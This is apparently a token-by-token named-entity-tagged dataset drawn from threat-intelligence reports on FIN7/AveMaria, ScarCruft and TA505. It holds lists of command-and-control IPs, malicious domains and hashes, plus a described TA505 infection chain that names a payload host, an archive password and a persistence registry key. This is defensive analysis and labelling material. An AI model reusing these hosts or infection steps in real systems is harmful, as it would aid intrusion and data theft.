+This O +company O +seems O +to O +have O +been O +used O +by O +the O +FIN7 S-APT +threat O +actor O +to O +hire O +new O +people O +as O +translators O +, O +developers O +and O +pentesters O +. O + +During O +our O +research O +, O +we O +found O +various O +job O +advertisements O +associated O +with O +the O +company O +on O +freelance O +and O +remote-work O +websites O +. 
O + +While O +tracking O +numerous O +threat O +actors O +on O +a O +daily O +basis O +during O +the B-TIME +final I-TIME +days I-TIME +of I-TIME +2018 E-TIME +and O +at O +the B-TIME +beginning I-TIME +of I-TIME +2019 E-TIME +, O +we O +discovered O +various O +activity O +clusters O +sharing O +certain O +TTPs O +associated O +with O +the O +FIN7 S-APT +intrusion O +set O +. O + +The O +link O +between O +these O +threat O +actors O +and O +FIN7 S-APT +is O +still O +weak O +, O +but O +we O +decided O +to O +disclose O +a O +few O +hints O +regarding O +these O +in O +this O +blog O +post O +. O + +In O +his O +history O +, O +FIN7 S-APT +has O +overlapped O +several O +times O +with O +Cobalt S-MAL/EmpireMonkey S-MAL +in O +terms O +of O +TTPs O +. O + +This O +activity O +cluster O +, O +which O +Kaspersky O +Lab O +has O +followed O +for O +a O +few O +years O +, O +uses O +various O +implants O +for O +targeting O +mainly O +banks O +, O +and O +developers O +of O +banking O +and O +money O +processing O +software O +solutions O +. O + +At O +the B-TIME +end I-TIME +of I-TIME +2018 E-TIME +, O +the O +cluster O +started O +to O +use O +not O +only O +CobaltStrike S-TOOL +but O +also O +Powershell S-TOOL +Empire S-TOOL +in O +order O +to O +gain O +a O +foothold O +on O +the O +victims’ O +networks O +. O + +After O +a O +successful O +penetration O +, O +it O +uses O +its O +own O +backdoors O +and O +the O +CobaltStrike S-TOOL +framework O +or O +Powershell S-TOOL +Empire S-TOOL +components O +to O +hop O +to O +interesting O +parts O +of O +the O +network O +, O +where O +it O +can O +monetize O +its O +access O +. O + +FIN7 S-APT +’s O +last O +campaigns O +were O +targeting O +banks O +in O +Europe S-LOC +and O +Central B-LOC +America E-LOC +. O + +This O +threat O +actor O +stole O +suspected O +of O +stealing O +€13 O +million O +from O +Bank O +of O +Valetta S-LOC +, O +Malta S-LOC +earlier B-TIME +this I-TIME +year E-TIME +. 
O + +A O +few O +interesting O +overlaps O +in O +recent O +FIN7 S-APT +campaigns O +: O +Both O +used O +macros S-TOOL +to O +copy O +wscript.exe S-FILE +to O +another O +file O +, O +which O +began O +with O +“ O +ms O +” O +( O +mses.exe S-FILE +– O +FIN7 S-APT +, O +msutil.exe S-FILE +– O +EmpireMonkey S-MAL +) O +. O + +Both O +executed O +a O +JScript S-TOOL +file O +named O +“ O +error O +” O +in O +%TEMP% O +( O +Errors.txt S-FILE +in O +the O +case O +of O +FIN7 S-APT +, O +Errors.bat S-FILE +for O +EmpireMonkey S-MAL +) O +. O + +Both O +used O +DocuSign S-TOOL +decoy O +documents O +with O +different O +macros S-TOOL +. O + +The O +macros S-TOOL +popped O +the O +same O +“ O +Document O +decryption O +error O +” O +error O +message—even O +if O +macro S-TOOL +code O +remain O +totally O +different O +. O + +We O +have O +a O +high O +level O +of O +confidence O +in O +a O +historic O +association O +between O +FIN7 S-APT +and O +Cobalt S-MAL +, O +even O +though O +we O +believe O +that O +these O +two O +clusters O +of O +activity O +are O +operated O +by O +different O +teams O +. O + +AveMaria S-MAL +is O +a O +new O +botnet O +, O +whose O +first O +version O +we O +found O +in O +September B-TIME +2018 E-TIME +, O +right O +after O +the O +arrests O +of O +the O +FIN7 S-APT +members O +. O + +We O +have O +medium O +confidence O +that O +this O +botnet O +falls O +under O +the O +FIN7 S-APT +umbrella O +. O + +In O +fact O +, O +AveMaria S-MAL +is O +a O +classic O +infostealer O +bot O +that O +collects O +all O +possible O +credentials O +from O +various O +types O +of O +software O +: O +browsers O +, O +email S-TOOL +clients O +, O +messengers O +, O +etc. O +, O +and O +can O +act O +as O +a O +keylogger O +. O + +Since O +the B-TIME +beginning I-TIME +of I-TIME +2019 E-TIME +, O +we O +have O +collected O +more O +than O +1300 O +samples O +and O +extracted O +more O +than O +130 O +C2s O +. 
O + +To O +deliver O +their O +malware O +, O +the O +cyber O +criminals O +use O +spearphishing S-ACT +emails S-TOOL +with O +various O +types O +of O +attachments O +: O +MS S-IDTY +Office S-TOOL +documents O +or O +spreadsheet O +files O +exploiting O +some O +known O +vulnerability O +like O +CVE-2017-11882 S-VULID +, O +or O +documents O +with O +Ole2Link S-VULNAME +and O +SCT S-VULNAME +. O + +They O +also O +use O +AutoIT S-TOOL +droppers O +, O +password-protected O +EXE S-TOOL +files O +and O +even O +ISO S-TOOL +images O +. O + +What O +is O +interesting O +, O +in O +some O +emails S-TOOL +, O +they O +ask O +targets O +to O +phone O +them O +if O +they O +have O +any O +questions O +, O +like O +the O +FIN7 S-APT +guys O +do O +. O + +During O +the O +investigation O +into O +FIN7 S-APT +, O +our O +threat-hunting O +systems O +found O +an O +interesting O +overlap O +in O +between O +the O +infrastructure O +of O +FIN7 S-APT +and O +AveMaria S-MAL +. O + +Basically O +, O +two O +servers O +in O +the O +same O +IP O +range O +and O +AS14576 O +( O +autonomous O +system O +) O +share O +a O +non-standard O +SSH S-PROT +port O +, O +which O +is O +222 O +. O + +One O +of O +the O +servers O +is O +a O +Griffon S-MAL +C2, O +and O +the O +other O +one O +, O +an O +AveMaria S-MAL +C2 S-TOOL +. O + +Distribution O +of O +targets O +is O +another O +factor O +suggesting O +that O +these O +two O +malware O +families O +may O +be O +connected O +. O + +We O +analyzed O +AveMaria S-MAL +targets O +during O +February B-TIME +and I-TIME +March I-TIME +of I-TIME +2019 E-TIME +. O + +The O +spearphishing S-ACT +emails S-TOOL +were O +sent O +to O +various O +kinds O +of O +businesses O +only O +and O +did O +not O +target O +individuals O +. 
O + +Thirty O +percent O +of O +the O +targets O +were O +small O +and O +medium-sized O +companies O +that O +were O +suppliers O +or O +service O +providers O +for O +bigger O +players O +and O +21% O +were O +various O +types O +of O +manufacturing O +companies O +. O + +We O +also O +spotted O +several O +typical O +FIN7 S-APT +targets O +, O +such O +as O +retailers O +and O +hotels O +. O + +Most O +AveMaria S-MAL +targets O +( O +72% O +) O +were O +in O +the O +EU S-IDTY +. O + +At O +the B-TIME +end I-TIME +of I-TIME +2018 E-TIME +, O +while O +searching O +for O +new O +FIN7 S-APT +campaigns O +via O +telemetry O +, O +we O +discovered O +a O +set O +of O +activity O +that O +we O +temporarily O +called O +“ O +CopyPaste S-APT +” O +from O +a O +previously O +unknown O +APT O +. O + +Interestingly O +, O +this O +actor O +targeted O +financial O +entities O +and O +companies O +in O +one O +African O +country O +, O +which O +lead O +us O +to O +think O +that O +CopyPaste S-APT +was O +associated O +with O +cybermercenaries O +or O +a O +training O +center O +. O + +This O +set O +of O +activity O +relied O +on O +open-source O +tools O +, O +such O +as O +Powershell S-TOOL +Empire S-TOOL +, O +and O +well-documented O +red O +teaming O +techniques O +, O +in O +order O +to O +get O +a O +foothold O +within O +the O +victim’s O +networks O +and O +avoid O +detection O +. O + +The O +links O +between O +CopyPaste S-APT +and O +FIN7 S-APT +are O +still O +very O +weak O +. O + +It O +is O +possible O +that O +the O +CopyPaste S-APT +operators O +were O +influenced O +by O +open-source O +publications O +and O +do O +not O +have O +any O +ties O +with O +FIN7 S-APT +. O + +During O +2018 S-TIME +, O +Europol S-IDTY +and O +DoJ S-IDTY +announced O +the O +arrest O +of O +the O +leader O +of O +the O +FIN7 S-APT +and O +Carbanak S-APT/CobaltGoblin S-APT +cybercrime O +groups O +. 
O + +It O +was O +believed O +that O +the O +arrest O +of O +the O +group O +leader O +will O +have O +an O +impact O +on O +the O +group’s O +operations O +. O + +However O +, O +recent O +data O +seems O +to O +indicate O +that O +the O +attacks O +have O +continued O +without O +significant O +drawbacks O +. O + +One O +may O +say O +CobaltGoblin S-APT +and O +FIN7 S-APT +have O +even O +extended O +the O +number O +of O +groups O +operating O +under O +their O +umbrella O +. O + +We O +observe O +, O +with O +various O +level O +of O +confidence O +, O +that O +there O +are O +several O +interconnected O +groups O +using O +very O +similar O +toolkits O +and O +the O +same O +infrastructure O +to O +conduct O +their O +cyberattacks O +. O + +The O +first O +of O +them O +is O +the O +well-known O +FIN7 S-APT +, O +which O +specializes O +in O +attacking O +various O +companies O +to O +get O +access O +to O +financial O +data O +or O +PoS S-TOOL +infrastructure O +. O + +They O +rely O +on O +a O +Griffon S-MAL +JS S-TOOL +backdoor O +and O +Cobalt S-MAL/Meterpreter S-TOOL +, O +and O +in O +recent O +attacks O +, O +Powershell S-TOOL +Empire S-TOOL +. O + +The O +second O +one O +is O +CobaltGoblin S-APT/Carbanak S-APT/EmpireMonkey S-APT +, O +which O +uses O +the O +same O +toolkit O +, O +techniques O +and O +similar O +infrastructure O +but O +targets O +only O +financial O +institutions O +and O +associated O +software/services O +providers O +. O + +We O +link O +the O +AveMaria S-MAL +botnet O +to O +these O +two O +groups O +with O +medium O +confidence O +: O +AveMaria S-MAL +’s O +targets O +are O +mostly O +suppliers O +for O +big O +companies O +, O +and O +the O +way O +AveMaria S-MAL +manages O +its O +infrastructure O +is O +very O +similar O +to O +FIN7 S-APT +. 
O + +The O +last O +piece O +is O +the O +newly O +discovered O +CopyPaste S-APT +group O +, O +who O +targeted O +financial O +entities O +and O +companies O +in O +one O +African O +country O +, O +which O +lead O +us O +to O +think O +that O +CopyPaste S-APT +was O +associated O +with O +cybermercenaries O +or O +a O +training O +center O +. O + +The O +links O +between O +CopyPaste S-APT +and O +FIN7 S-APT +are O +still O +very O +weak O +. O + +It O +is O +possible O +that O +the O +operators O +of O +this O +cluster O +of O +activity O +were O +influenced O +by O +open-source O +publications O +and O +do O +not O +have O +any O +ties O +with O +FIN7 S-APT +. O + +All O +of O +the O +aforementioned O +groups O +greatly O +benefit O +from O +unpatched O +systems O +in O +corporate O +environments O +. O + +They O +thus O +continue O +to O +use O +effective O +spearphishing S-ACT +campaigns O +in O +conjunction O +with O +well-known O +MS S-IDTY +Office S-TOOL +exploits O +generated O +by O +the O +framework O +. O + +So O +far O +, O +the O +groups O +have O +not O +used O +any O +zero-days S-VULNAME +. O + +FIN7 S-APT/Cobalt S-MAL +phishing E-ACT +documents O +may O +seem O +basic O +, O +but O +when O +combined O +with O +their O +extensive O +social O +engineering O +and O +focused O +targeting O +, O +they O +are O +quite O +successful O +. O + +As O +with O +their O +previous O +fake O +company O +“ O +Combi B-IDTY +Security E-IDTY +” O +, O +we O +are O +confident O +that O +they O +continue O +to O +create O +new O +personas O +for O +use O +in O +either O +targeting O +or O +recruiting O +under O +a O +“ O +new O +” O +brand O +, O +“ O +IPC S-IDTY +” O +. O + +AveMaria S-MAL +: O +185.61.138.249 S-IP +tain.warzonedns.com S-DOM +noreply377.ddns.net S-DOM +185.162.131.97 S-IP +91.192.100.62 S-IP +server.mtcc.me S-DOM +doddyfire.dyndns.org S-DOM +212.8.240.116 S-IP +168.167.45.162 S-IP +toekie.ddns.net S-DOM +warmaha.warzonedns.com S-DOM +. 
O + +CopyPaste S-APT +: O +digi-cert.org S-DOM +somtelnetworks.com S-DOM +geotrusts.com S-DOM +secureclientupdate.com S-DOM +digicertweb.com S-DOM +sport-pesa.org S-DOM +itaxkenya.com S-DOM +businessdailyafrica.net S-DOM +infotrak-research.com S-DOM +nairobiwired.com S-DOM +k-24tv.com S-DOM +. O + +FIN7 S-APT/GRIFFON S-MAL +: O +hpservice-cdn.com S-DOM +realtek-cdn.com S-DOM +logitech-cdn.com S-DOM +pci-cdn.com S-DOM +appleservice-cdn.com S-DOM +servicebing-cdn.com S-DOM +. O + + +ScarCruft S-APT +continues O +to O +evolve, O +introduces O +Bluetooth S-TOOL +harvester O +. O + +After O +publishing O +our O +initial O +series O +of O +blogposts O +back O +in O +2016 S-TIME +, O +we O +have O +continued O +to O +track O +the O +ScarCruft S-APT +threat O +actor O +. O + +ScarCruft S-APT +is O +a O +Korean-speaking O +and O +allegedly O +state-sponsored O +threat O +actor O +that O +usually O +targets O +organizations O +and O +companies O +with O +links O +to O +the O +Korean O +peninsula O +. O + +We O +recently O +discovered O +some O +interesting O +telemetry O +on O +this O +actor O +, O +and O +decided O +to O +dig O +deeper O +into O +ScarCruft S-APT +’s O +recent O +activity O +. O + +This O +shows O +that O +the O +actor O +is O +still O +very O +active O +and O +constantly O +trying O +to O +elaborate O +its O +attack O +tools O +. O + +Based O +on O +our O +telemetry O +, O +we O +can O +reassemble O +ScarCruft S-APT +’s O +binary O +infection O +procedure O +. O + +It O +used O +a O +multi-stage O +binary O +infection O +to O +update O +each O +module O +effectively O +and O +evade O +detection O +. O + +In O +addition O +, O +we O +analyzed O +the O +victims O +of O +this O +campaign O +and O +spotted O +an O +interesting O +overlap O +of O +this O +campaign O +with O +another O +APT O +actor O +known O +as O +DarkHotel S-APT +. 
O + +The O +ScarCruft S-APT +group O +uses O +common O +malware O +delivery O +techniques O +such O +as O +spear B-ACT +phishing E-ACT +and O +Strategic B-ACT +Web I-ACT +Compromises E-ACT +( O +SWC S-ACT +) O +. O + +As O +in O +Operation B-ACT +Daybreak E-ACT +, O +this O +actor O +performs O +sophisticated O +attacks O +using O +a O +zero-day S-MAL +exploit O +. O + +However O +, O +sometimes O +using O +public O +exploit O +code O +is O +quicker O +and O +more O +effective O +for O +malware O +authors O +. O + +We O +witnessed O +this O +actor O +extensively O +testing O +a O +known O +public O +exploit O +during O +its O +preparation O +for O +the O +next O +campaign O +. O + +In O +order O +to O +deploy O +an O +implant O +for O +the O +final O +payload O +, O +ScarCruft S-APT +uses O +a O +multi-stage O +binary O +infection O +scheme O +. O + +As O +a O +rule O +, O +the O +initial O +dropper O +is O +created O +by O +the O +infection O +procedure O +. O + +One O +of O +the O +most O +notable O +functions O +of O +the O +initial O +dropper O +is O +to O +bypass O +Windows S-OS +UAC S-TOOL +( O +User B-TOOL +Account I-TOOL +Control E-TOOL +) O +in O +order O +to O +execute O +the O +next O +payload O +with O +higher O +privileges O +. O + +This O +malware O +uses O +the O +public O +privilege O +escalation O +exploit O +code O +CVE-2018-8120 S-VULID +or O +UACME S-VULNAME +which O +is O +normally O +used O +by O +legitimate O +red O +teams O +. O + +Afterwards O +, O +the O +installer S-TOOL +malware O +creates O +a O +downloader O +and O +a O +configuration O +file O +from O +its O +resource O +and O +executes O +it O +. O + +The O +downloader S-TOOL +malware O +uses O +the O +configuration O +file O +and O +connects O +to O +the O +C2 S-TOOL +server O +to O +fetch O +the O +next O +payload O +. O + +In O +order O +to O +evade O +network O +level O +detection O +, O +the O +downloader S-TOOL +uses O +steganography O +. 
O + +The O +downloaded O +payload O +is O +an O +image O +file O +, O +but O +it O +contains O +an O +appended O +malicious O +payload O +to O +be O +decrypted O +. O + +The O +final O +payload O +created O +by O +the O +aforementioned O +process O +is O +a O +well O +known O +backdoor O +, O +also O +known O +as O +ROKRAT S-MAL +by O +Cisco B-SECTEAM +Talos E-SECTEAM +. O + +This O +cloud O +service-based O +backdoor O +contains O +many O +features O +. O + +One O +of O +its O +main O +functions O +is O +to O +steal O +information O +. O + +Upon O +execution O +, O +this O +malware O +creates O +10 O +random O +directory O +paths O +and O +uses O +them O +for O +a O +specially O +designated O +purpose O +. O + +The O +malware O +creates O +11 O +threads O +simultaneously O +: O +six O +threads O +are O +responsible O +for O +stealing O +information O +from O +the O +infected O +host O +, O +and O +five O +threads O +are O +for O +forwarding O +collected O +data O +to O +four O +cloud O +services O +( O +Box S-TOOL +, O +Dropbox S-TOOL +, O +Pcloud S-TOOL +and O +Yandex S-TOOL +) O +. O + +When O +uploading O +stolen O +data O +to O +a O +cloud O +service O +, O +it O +uses O +predefined O +directory O +path O +such O +as O +/english O +, O +/video O +or O +/scriptout O +. O + +The O +ScarCruft S-APT +group O +keeps O +expanding O +its O +Exfiltration S-ACT +targets O +to O +steal O +further O +information O +from O +infected O +hosts O +and O +continues O +to O +create O +tools O +for O +additional O +data O +Exfiltration S-ACT +. O + +We O +also O +discovered O +an O +interesting O +piece O +of O +rare O +malware O +created O +by O +this O +threat O +actor O +– O +a O +Bluetooth S-TOOL +device O +harvester O +. O + +This O +malware O +is O +responsible O +for O +stealing O +Bluetooth S-TOOL +device O +information O +. O + +It O +is O +fetched O +by O +a O +downloader O +, O +and O +collects O +information O +directly O +from O +the O +infected O +host O +. 
O + +This O +malware O +uses O +Windows S-OS +Bluetooth S-TOOL +APIs O +to O +find O +information O +on O +connected O +Bluetooth S-TOOL +devices O +and O +saves O +the O +following O +information O +. O + +We O +have O +found O +several O +victims O +of O +this O +campaign O +, O +based O +on O +our O +telemetry O +– O +investment O +and O +trading O +companies O +in O +Vietnam S-LOC +and O +Russia S-LOC +. O + +We O +believe O +they O +may O +have O +some O +links O +to O +North B-LOC +Korea E-LOC +, O +which O +may O +explain O +why O +ScarCruft S-APT +decided O +to O +closely O +monitor O +them O +. O + +ScarCruft S-APT +also O +attacked O +a O +diplomatic O +agency O +in O +Hong B-LOC +Kong E-LOC +, O +and O +another O +diplomatic O +agency O +in O +North B-LOC +Korea E-LOC +. O + +It O +appears O +ScarCruft S-APT +is O +primarily O +targeting O +intelligence O +for O +political O +and O +diplomatic O +purposes O +. O + +We O +discovered O +one O +victim O +from O +Russia S-LOC +that O +also O +triggered O +a O +malware O +detection O +while O +staying O +in O +North B-LOC +Korea E-LOC +in O +the O +past O +. O + +The O +fact O +that O +this O +victim O +visits O +North B-LOC +Korea E-LOC +makes O +its O +special O +and O +suggests O +that O +it O +may O +have O +valuable O +information O +about O +North O +Korean O +affairs O +. O + +ScarCruft S-APT +infected O +this O +victim O +on O +September B-TIME +21, I-TIME +2018 E-TIME +. O + +But O +before O +the O +ScarCruft S-APT +infection O +, O +however O +, O +another O +APT O +group O +also O +targeted O +this O +victim O +with O +the O +host O +being O +infected O +with O +GreezeBackdoor S-MAL +on O +March B-TIME +26, I-TIME +2018 E-TIME +. O + +GreezeBackdoor S-MAL +is O +a O +tool O +of O +the O +DarkHotel S-APT +APT O +group O +, O +which O +we O +have O +previously O +written O +about O +. 
O + +In O +addition O +, O +this O +victim O +was O +also O +attacked O +by O +the O +Konni S-MAL +malware O +on O +03 B-TIME +April I-TIME +2018 E-TIME +. O + +The O +Konni S-MAL +malware O +was O +disguised O +as O +a O +North O +Korean O +news O +item O +in O +a O +weaponized O +documents O +( O +the O +name O +of O +the O +document O +was O +“ O +Why O +North B-LOC +Korea E-LOC +slams O +South B-LOC +Korea E-LOC +’s O +recent O +defense O +talks O +with O +U.S-Japan.zip S-FILE +” O +) O +This O +is O +not O +the O +first O +time O +we O +have O +seen O +an O +overlap O +of O +ScarCruft S-APT +and O +DarkHotel S-APT +actors O +. O + +Members O +from O +our O +team O +have O +already O +presented O +on O +the O +conflict O +of O +these O +two O +threat O +actors O +at O +security O +conferences O +. O + +We O +have O +also O +shared O +more O +details O +with O +our O +threat O +intelligence O +customers O +in O +the O +past O +. O + +They O +are O +both O +Korean-speaking O +threat O +actors O +and O +sometimes O +their O +victimology O +overlaps O +. O + +But O +both O +group O +seem O +to O +have O +different O +TTPs O +( O +Tactics O +, O +Techniques O +and O +Procedures O +) O +and O +it O +leads O +us O +to O +believe O +that O +one O +group O +regularly O +lurks O +in O +the O +other O +’s O +shadow O +. O + +The O +ScarCruft S-APT +has O +shown O +itself O +to O +be O +a O +highly-skilled O +and O +active O +group O +. O + +It O +has O +a O +keen O +interest O +in O +North O +Korean O +affairs O +, O +attacking O +those O +in O +the O +business O +sector O +who O +may O +have O +any O +connection O +to O +North B-LOC +Korea E-LOC +, O +as O +well O +as O +diplomatic O +agencies O +around O +the O +globe O +. O + +ScarCruft S-APT +tools O +: O +02681a7fe708f39beb7b3cf1bd557ee9 S-MD5 +Bluetooth S-TOOL +info O +harvester O +. O + +ScarCruft S-APT +tools O +: O +C781f5fad9b47232b3606e4d374900cd S-MD5 +Installer S-TOOL +. 
O + +ScarCruft S-APT +tools O +: O +032ed0cd234f73865d55103bf4ceaa22 S-MD5 +Downloader S-TOOL +. O + +ScarCruft S-APT +tools O +: O +22aaf617a86e026424edb7c868742495 S-MD5 +AV B-TOOL +Remover E-TOOL +. O + +ScarCruft S-APT +tools O +: O +07d2200f5c2d03845adb5b20841faa94 S-MD5 +AV B-TOOL +Remover E-TOOL +. O + +GreezaBackdoor S-MAL +of O +DarkHotel S-APT +: O +5e0e11bca0e94914e565c1dcc1ee6860 S-MD5 +. O + + +TA505 S-APT +is O +Expanding O +its O +Operations O +In O +the O +last O +few O +days O +, O +during O +monitoring O +activities O +, O +Yoroi B-SECTEAM +CERT E-SECTEAM +noticed O +a O +suspicious O +attack O +against O +an O +Italian O +organization O +. O + +The O +malicious O +email S-TOOL +contains O +a O +highly O +suspicious O +sample O +which O +triggered O +the O +ZLAB S-SECTEAM +team O +to O +investigate O +its O +capabilities O +and O +its O +possible O +attribution O +, O +discovering O +a O +potential O +expansion O +of O +the O +TA505 S-APT +operation O +. O + +The O +threat O +group O +is O +also O +known O +for O +its O +recent O +attack O +campaign O +against O +Bank O +and O +Retail O +business O +sectors O +, O +but O +the O +latest O +evidence O +indicates O +a O +potential O +expansion O +of O +its O +criminal O +operation O +to O +other O +industries O +too O +. O + +Dropper S-MAL +: O +0c88e285b6fc183c96b6f03ca5700cc9ca7c83dfccc6ad14a946d1868d1cc273 S-SHA2 +Excel S-TOOL +file O +with O +malicious B-TOOL +macro E-TOOL +. O + +The O +intercepted O +attack O +starts O +with O +a O +spear B-ACT +phishing I-ACT +email E-ACT +embedding O +a O +spreadsheet O +. O + +The O +document O +is O +weaponized O +with O +malicious B-TOOL +macro E-TOOL +code O +triggered O +when O +the O +user O +opens O +the O +document O +to O +see O +the O +content O +under O +the O +obfuscated O +view O +. O + +To O +understand O +its O +capabilities O +, O +the O +macro S-TOOL +code O +has O +been O +isolated O +and O +analyzed O +in O +detail O +. 
O + +Surprisingly O +, O +the O +source O +code O +is O +composed O +by O +more O +than O +1600 O +lines O +of O +code O +and O +it O +is O +highly O +obfuscated O +. O + +Paying O +more O +attention O +during O +the O +code O +analysis O +, O +we O +discovered O +that O +it O +is O +full O +of O +junk O +instructions O +used O +to O +declare O +and O +initialize O +variables O +never O +used O +. O + +Only O +a O +small O +portion O +of O +this O +code O +is O +actually O +used O +to O +start O +the O +infection O +, O +the O +rest O +is O +just O +junk O +code O +. O + +Once O +the O +macro S-TOOL +is O +executed O +, O +the O +malware O +downloads O +two O +files O +from O +“ O +kentona[.su S-DOM +” O +, O +using O +an O +SSL S-PROT +encrypted O +communication O +, O +and O +stores O +them O +in O +“ O +C:\Users\Public O +” O +path O +: O +“ O +rtegre.exe S-FILE +” O +and O +“ O +wprgxyeqd79.exe S-FILE +” O +. O + +Generic S-MAL +: O +aafa83d5e0619e69e64fcac4626cfb298baac54c7251f479721df1c2eb16bee7 S-SHA2 +Trojan S-MAL/Downloader S-TOOL +( O +Executable O +file O +) O +. O + +Trojan S-MAL +: O +6f1a8ee627ec2ed7e1d818d32a34a163416938eb13a97783a71f9b79843a80a2 S-SHA2 +SFX S-TOOL +( O +self-extracting B-TOOL +archive E-TOOL +) O +( O +Executable O +file O +) O +. O + +The O +“ O +wprgxyeqd79.exe S-FILE +” O +sample O +actually O +is O +a O +Self B-TOOL +Extracting I-TOOL +Archive E-TOOL +( O +SFX S-TOOL/SFA S-TOOL +) O +containing O +four O +files O +designed O +to O +be O +extracted O +in O +the O +%TEMP% O +folder O +. O + +After O +that O +, O +it O +executes O +“ O +exit.exe S-FILE +” O +which O +launches O +the O +“ O +i.cmd S-FILE +” O +batch O +script O +. O + +This O +new O +script O +performs O +a O +ping O +to O +“ O +www[.cloudflare[.com S-DOM +” O +for O +three O +times O +with O +a O +delay O +of O +3000ms O +, O +testing O +the O +connectivity O +of O +the O +victim O +machine O +. 
O + +If O +the O +host O +is O +successfully O +reached O +, O +the O +script O +renames O +a O +file O +named O +“ O +kernel.dll S-FILE +” O +, O +obviously O +not O +the O +real O +one O +, O +in O +“ O +uninstall.exe S-FILE +” O +, O +another O +misleading O +name O +. O + +Then O +it O +invokes O +the O +renamed O +executable O +and O +runs O +it O +passing O +a O +series O +of O +parameter O +: O +“ O +uninstall.exe S-FILE +x O +-pQELRatcwbU2EJ5 O +-y O +” O + +These O +parameters O +are O +needed O +to O +self-decrypt O +the O +“ O +uninstall.exe S-FILE +” O +file O +which O +is O +again O +another O +SFX S-TOOL +archive O +. O + +The O +“ O +-p O +” O +parameter O +, O +indeed O +, O +specify O +the O +password O +of O +the O +archive O +to O +be O +extracted O +. O + +The O +crucial O +file O +, O +at O +this O +point O +of O +the O +infection O +, O +is O +the O +SFX S-TOOL +executable O +named O +“ O +uninstall.exe S-FILE +” O +. O + +It O +has O +a O +structure O +similar O +to O +previous O +“ O +wprgxyeqd79.exe S-FILE +” O +file O +: O +two O +of O +their O +files O +have O +the O +same O +name O +, O +but O +the O +content O +of O +this O +new O +SFX S-TOOL +is O +extracted O +in O +the O +“ O +%ALLUSERSPROFILE%\Windows S-OS +Anytime O +Upgrade O +” O +directory O +. O + +Another O +time O +, O +the O +execution O +flow O +moves O +from O +“ O +exit.exe S-FILE +to O +“ O +i.cmd S-FILE +” O +. O + +The O +script O +is O +quite O +different O +from O +the O +previous O +one O +: O +it O +guarantees O +its O +persistence O +on O +the O +victim O +machine O +through O +the O +setting O +of O +“ O +HKCU\Software\Microsoft\Windows\CurrentVersion\Run O +” O +registry O +key O +, O +creating O +a O +new O +entry O +named O +“ O +Windows S-OS +Anytime O +Upgrade O +” O +which O +points O +to O +“ O +winserv.exe S-FILE +” O +, O +just O +stored O +into O +the O +same O +folder O +. 
O + +Thus O +, O +the O +script O +provides O +to O +run O +“ O +winserv.exe S-FILE +” O +. O + +An O +interesting O +part O +of O +the O +script O +is O +the O +continuous O +killing O +of O +every O +“ O +rundll32.exe S-FILE +” O +process O +running O +into O +the O +victim O +machine O +, O +generates O +a O +huge O +amount O +of O +noise O +, O +as O +visible O +in O +the O +following O +process O +explorer O +view O +. O + +Anyway O +, O +just O +before O +the O +kill O +loop O +, O +the O +real O +malicious O +payload O +is O +executed O +: O +the O + +“ O +winserv.exe S-FILE +” O +file O +. O + +Analyzing O +it O +in O +depth O +, O +we O +discover O +it O +actually O +is O +the O +RMS S-TOOL +( O +Remote B-TOOL +Manipulator I-TOOL +System E-TOOL +) O +client O +by O +TektonIT S-TOOL +, O +encrypted O +using O +the O +MPress B-TOOL +PE E-TOOL +compressor O +utility O +, O +a O +legitimate O +tool O +, O +to O +avoid O +antivirus O +detection O +. O + +TektonIT S-TOOL +RMS S-TOOL +acts O +as O +a O +remote O +administration O +tool O +, O +allowing O +the O +attacker O +to O +gain O +complete O +access O +to O +the O +victim O +machine O +. O + +Together O +with O +the O +RMS S-TOOL +executable O +, O +there O +is O +another O +file O +named O +“ O +settings.dat S-FILE +” O +containing O +the O +custom O +configuration O +prepared O +by O +the O +attacker O +. O + +It O +contains O +information O +like O +: O +Server O +address O +and O +port O +the O +client O +will O +connect O +to O +; O +The O +password O +chosen O +by O +the O +attacker O +for O +the O +remote O +access O +; O +The O +ID O +associated O +to O +the O +victim O +client O +. O + +All O +these O +information O +are O +automatically O +loaded O +by O +the O +RMS S-TOOL +executable O +and O +firstly O +stored O +in O +the O +registry O +key O +“ O +HKCU\Software\tektonik\Remote O +MANIPULATOR O +System\Host\parameters O +” O +. 
O + +At O +the O +next O +startup O +, O +the O +software O +will O +directly O +load O +the O +configuration O +from O +the O +just O +created O +key O +. O + +The O +client O +establishes O +a O +new O +connection O +with O +the O +remote O +command O +and O +control O +server O +hosted O +on O +a O +Bulgarian S-LOC +remote O +host O +217.12.201.159 S-IP +, O +part O +of O +a O +Virtual B-TOOL +Dedicated I-TOOL +Server E-TOOL +subnet O +of O +the O +AS-21100, O +operated O +by O +ITL S-TOOL +LLC S-TOOL +. O + +After O +the O +reconstruction O +of O +the O +full O +infection O +chain O +, O +we O +noticed O +strong O +similarities O +with O +a O +recent O +spear-phishing S-ACT +attack O +campaign O +against O +an O +unspecified O +US S-LOC +retail O +company O +. O + +The O +attack O +, O +as O +stated O +by O +CyberInt S-IDTY +, O +leveraged O +a O +command O +and O +control O +server O +located O +in O +Germany S-LOC +related O +to O +the O +TA505 S-APT +actor O +: O +a O +very O +active O +group O +involved O +in O +cyber-criminal O +operation O +all O +around O +the O +world O +, O +threatening O +a O +wide O +range O +of O +high O +profile O +companies O +, O +active O +since O +2014 S-TIME +. O + +The O +comparison O +of O +the O +infection O +chains O +reveals O +in O +both O +cases O +the O +attacker O +used O +a O +couple O +of O +SFX S-TOOL +stages O +to O +deploy O +the O +“ O +RMS S-TOOL +” O +software O +: O +a O +legitimate O +remote O +administration O +tool O +produced O +by O +the O +Russian O +company O +“ O +TektonIT S-TOOL +” O +. O + +The O +tool O +is O +able O +to O +grant O +remote O +access O +and O +full O +, O +direct O +control O +of O +the O +infected O +machine O +to O +the O +group O +. 
